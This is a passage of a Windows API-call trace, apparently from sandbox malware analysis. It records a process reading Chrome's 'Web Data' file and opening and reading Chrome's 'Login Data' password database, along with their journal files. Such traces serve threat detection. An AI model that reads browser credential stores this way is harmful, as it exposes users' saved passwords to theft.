CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb558, cbMultiByte=-1, lpWideCharStr=0x3eb278, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 80 [0088.017] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0088.017] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", nBufferLength=0x53, lpBuffer=0x3eb320, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpFilePart=0x0) returned 0x4f [0088.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0088.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", cchWideChar=-1, lpMultiByteStr=0x3eb278, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data", lpUsedDefaultChar=0x0) returned 80 [0088.017] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x288a50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0088.017] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x288a50, cbMultiByte=-1, lpWideCharStr=0x3eb278, cchWideChar=80 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data") returned 80 [0088.017] GetDiskFreeSpaceW (in: lpRootPathName="C:", lpSectorsPerCluster=0x288b5c, lpBytesPerSector=0x288b58, lpNumberOfFreeClusters=0x288b5c, lpTotalNumberOfClusters=0x288b5c | out: lpSectorsPerCluster=0x288b5c, lpBytesPerSector=0x288b58, lpNumberOfFreeClusters=0x288b5c, lpTotalNumberOfClusters=0x288b5c) returned 1 [0088.017] ReadFile (in: hFile=0x10c, lpBuffer=0x288d14, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x288ce0, lpOverlapped=0x0 | out: lpBuffer=0x288d14*, lpNumberOfBytesRead=0x288ce0*=0x64, lpOverlapped=0x0) returned 1 [0088.219] LockFile (hFile=0x10c, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.219] LockFileEx (in: hFile=0x10c, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x28899c | out: lpOverlapped=0x28899c) returned 1 [0088.219] UnlockFile (hFile=0x10c, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.219] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb5a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0088.219] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb5a8, cbMultiByte=-1, lpWideCharStr=0x3ebe10, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 88 [0088.219] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), fInfoLevelId=0x0, lpFileInformation=0x28898c | out: lpFileInformation=0x28898c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x941466b0, ftCreationTime.dwHighDateTime=0x1d2dbcc, ftLastAccessTime.dwLowDateTime=0x941466b0, ftLastAccessTime.dwHighDateTime=0x1d2dbcc, ftLastWriteTime.dwLowDateTime=0x97826c20, ftLastWriteTime.dwHighDateTime=0x1d2dbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0088.219] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x2889c0 | out: lpFileSizeHigh=0x2889c0*=0x0) returned 0x11000 [0088.219] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb600, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0088.219] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb600, cbMultiByte=-1, lpWideCharStr=0x3ebe10, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal") returned 84 [0088.219] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data-wal"), fInfoLevelId=0x0, lpFileInformation=0x2889a4 | out: lpFileInformation=0x2889a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0088.219] GetLastError () returned 0x2 [0088.219] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x2889d8 | out: lpFileSizeHigh=0x2889d8*=0x0) returned 0x11000 [0088.220] ReadFile (in: hFile=0x10c, lpBuffer=0x3ed4cc, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x2889a0, lpOverlapped=0x0 | out: lpBuffer=0x3ed4cc*, lpNumberOfBytesRead=0x2889a0*=0x800, lpOverlapped=0x0) returned 1 [0088.220] ReadFile (in: hFile=0x10c, lpBuffer=0x3ee9cc, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x288800, lpOverlapped=0x0 | out: lpBuffer=0x3ee9cc*, lpNumberOfBytesRead=0x288800*=0x800, lpOverlapped=0x0) returned 1 [0088.520] ReadFile (in: hFile=0x10c, lpBuffer=0x695bfc, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x2887c8, lpOverlapped=0x0 | out: lpBuffer=0x695bfc*, lpNumberOfBytesRead=0x2887c8*=0x800, lpOverlapped=0x0) returned 1 [0088.520] ReadFile (in: hFile=0x10c, lpBuffer=0x6aeb74, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x2887d8, lpOverlapped=0x0 | out: lpBuffer=0x6aeb74*, lpNumberOfBytesRead=0x2887d8*=0x800, lpOverlapped=0x0) returned 1 [0088.520] UnlockFile (hFile=0x10c, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.520] LockFile (hFile=0x10c, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.520] LockFileEx (in: hFile=0x10c, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x288c7c | out: lpOverlapped=0x288c7c) returned 1 [0088.520] UnlockFile (hFile=0x10c, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.520] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb5a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 88 [0088.520] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb5a8, cbMultiByte=-1, lpWideCharStr=0x3eb290, cchWideChar=88 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal") returned 88 [0088.520] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-journal" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data-journal"), fInfoLevelId=0x0, lpFileInformation=0x288c6c | out: lpFileInformation=0x288c6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x941466b0, ftCreationTime.dwHighDateTime=0x1d2dbcc, ftLastAccessTime.dwLowDateTime=0x941466b0, ftLastAccessTime.dwHighDateTime=0x1d2dbcc, ftLastWriteTime.dwLowDateTime=0x97826c20, ftLastWriteTime.dwHighDateTime=0x1d2dbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0088.521] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x288cb8 | out: lpFileSizeHigh=0x288cb8*=0x0) returned 0x11000 [0088.521] SetFilePointer (in: hFile=0x10c, lDistanceToMove=24, lpDistanceToMoveHigh=0x288ca4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x288ca4*=0) returned 0x18 [0088.521] ReadFile (in: hFile=0x10c, lpBuffer=0x288ce4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x288cc4, lpOverlapped=0x0 | out: lpBuffer=0x288ce4*, lpNumberOfBytesRead=0x288cc4*=0x10, lpOverlapped=0x0) returned 1 [0088.521] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x288ca0 | out: lpFileSizeHigh=0x288ca0*=0x0) returned 0x11000 [0088.521] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb600, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 84 [0088.521] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x3eb600, cbMultiByte=-1, lpWideCharStr=0x3eb290, cchWideChar=84 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal") returned 84 [0088.521] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data-wal" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\web data-wal"), fInfoLevelId=0x0, lpFileInformation=0x288c84 | out: lpFileInformation=0x288c84*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0088.521] GetLastError () returned 0x2 [0088.521] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x288cb8 | out: lpFileSizeHigh=0x288cb8*=0x0) returned 0x11000 [0088.521] UnlockFile (hFile=0x10c, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.521] CloseHandle (hObject=0x10c) returned 1 [0088.521] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 0x46 [0088.521] wcslen (_String="Login Data") returned 0xa [0088.522] wcscpy (in: _Dest=0x28ad50, _Source="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0088.522] wcslen (_String="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 0x46 [0088.522] wcscat (in: _Dest=0x28ad50, _Source="\\" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0088.522] wcscat (in: _Dest=0x28ad50, _Source="Login Data" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" [0088.522] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data")) returned 0x2020 [0088.543] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0088.543] CloseHandle (hObject=0x10c) returned 1 [0088.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x28a5f0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpUsedDefaultChar=0x0) returned 82 [0088.543] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x28a5f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0088.543] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x28a5f0, cbMultiByte=-1, lpWideCharStr=0x698588, cchWideChar=82 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 82 [0088.543] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0088.543] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x55, lpBuffer=0x694948, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x51 [0088.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0088.543] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x694a00, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpUsedDefaultChar=0x0) returned 82 [0088.543] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69eff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0088.544] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69eff8, cbMultiByte=-1, lpWideCharStr=0x698588, cchWideChar=82 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 82 [0088.544] CreateFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0088.544] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69eff8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0088.544] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69eff8, cbMultiByte=-1, lpWideCharStr=0x694948, cchWideChar=82 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 82 [0088.544] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x52 [0088.544] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", nBufferLength=0x55, lpBuffer=0x69f108, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpFilePart=0x0) returned 0x51 [0088.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0088.544] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", cchWideChar=-1, lpMultiByteStr=0x69f1c0, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data", lpUsedDefaultChar=0x0) returned 82 [0088.544] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x288a50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0088.544] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x288a50, cbMultiByte=-1, lpWideCharStr=0x694948, cchWideChar=82 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data") returned 82 [0088.544] GetDiskFreeSpaceW (in: lpRootPathName="C:", lpSectorsPerCluster=0x288b5c, lpBytesPerSector=0x288b58, lpNumberOfFreeClusters=0x288b5c, lpTotalNumberOfClusters=0x288b5c | out: lpSectorsPerCluster=0x288b5c, lpBytesPerSector=0x288b58, lpNumberOfFreeClusters=0x288b5c, lpTotalNumberOfClusters=0x288b5c) returned 1 [0088.544] ReadFile (in: hFile=0x10c, lpBuffer=0x288d14, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x288ce0, lpOverlapped=0x0 | out: lpBuffer=0x288d14*, lpNumberOfBytesRead=0x288ce0*=0x64, lpOverlapped=0x0) returned 1 [0088.588] LockFile (hFile=0x10c, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.588] LockFileEx (in: hFile=0x10c, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x28899c | out: lpOverlapped=0x28899c) returned 1 [0088.588] UnlockFile (hFile=0x10c, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.588] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69f04a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.588] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69f04a, cbMultiByte=-1, lpWideCharStr=0x69f108, cchWideChar=90 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 90 [0088.588] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), fInfoLevelId=0x0, lpFileInformation=0x28898c | out: lpFileInformation=0x28898c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x951a3df0, ftCreationTime.dwHighDateTime=0x1d2dbcc, ftLastAccessTime.dwLowDateTime=0x951a3df0, ftLastAccessTime.dwHighDateTime=0x1d2dbcc, ftLastWriteTime.dwLowDateTime=0x9554f530, ftLastWriteTime.dwHighDateTime=0x1d2dbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0088.589] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x2889c0 | out: lpFileSizeHigh=0x2889c0*=0x0) returned 0x4800 [0088.589] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69f0a4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0088.589] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69f0a4, cbMultiByte=-1, lpWideCharStr=0x69f108, cchWideChar=86 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal") returned 86 [0088.589] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data-wal"), fInfoLevelId=0x0, lpFileInformation=0x2889a4 | out: lpFileInformation=0x2889a4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0088.589] GetLastError () returned 0x2 [0088.589] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x2889d8 | out: lpFileSizeHigh=0x2889d8*=0x0) returned 0x4800 [0088.589] ReadFile (in: hFile=0x10c, lpBuffer=0x6aeb74, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x2889a0, lpOverlapped=0x0 | out: lpBuffer=0x6aeb74*, lpNumberOfBytesRead=0x2889a0*=0x800, lpOverlapped=0x0) returned 1 [0088.590] UnlockFile (hFile=0x10c, dwFileOffsetLow=0x40000002, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1fe, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.590] LockFile (hFile=0x10c, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0) returned 1 [0088.590] LockFileEx (in: hFile=0x10c, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x288bac | out: lpOverlapped=0x288bac) returned 1 [0088.590] UnlockFile (hFile=0x10c, dwFileOffsetLow=0x40000000, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0088.590] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69f04a, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0088.590] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69f04a, cbMultiByte=-1, lpWideCharStr=0x6afd48, cchWideChar=90 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal") returned 90 [0088.590] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-journal" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data-journal"), fInfoLevelId=0x0, lpFileInformation=0x288b9c | out: lpFileInformation=0x288b9c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x951a3df0, ftCreationTime.dwHighDateTime=0x1d2dbcc, ftLastAccessTime.dwLowDateTime=0x951a3df0, ftLastAccessTime.dwHighDateTime=0x1d2dbcc, ftLastWriteTime.dwLowDateTime=0x9554f530, ftLastWriteTime.dwHighDateTime=0x1d2dbcc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0088.590] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x288be8 | out: lpFileSizeHigh=0x288be8*=0x0) returned 0x4800 [0088.590] SetFilePointer (in: hFile=0x10c, lDistanceToMove=24, lpDistanceToMoveHigh=0x288bd4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x288bd4*=0) returned 0x18 [0088.590] ReadFile (in: hFile=0x10c, lpBuffer=0x288c14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x288bf4, lpOverlapped=0x0 | out: lpBuffer=0x288c14*, lpNumberOfBytesRead=0x288bf4*=0x10, lpOverlapped=0x0) returned 1 [0088.590] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x288bd0 | out: lpFileSizeHigh=0x288bd0*=0x0) returned 0x4800 [0088.590] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69f0a4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0088.590] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69f0a4, cbMultiByte=-1, lpWideCharStr=0x6afd48, cchWideChar=86 | out: lpWideCharStr="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal") returned 86 [0088.590] GetFileAttributesExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data-wal" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\google\\chrome\\user data\\default\\login data-wal"), fInfoLevelId=0x0, 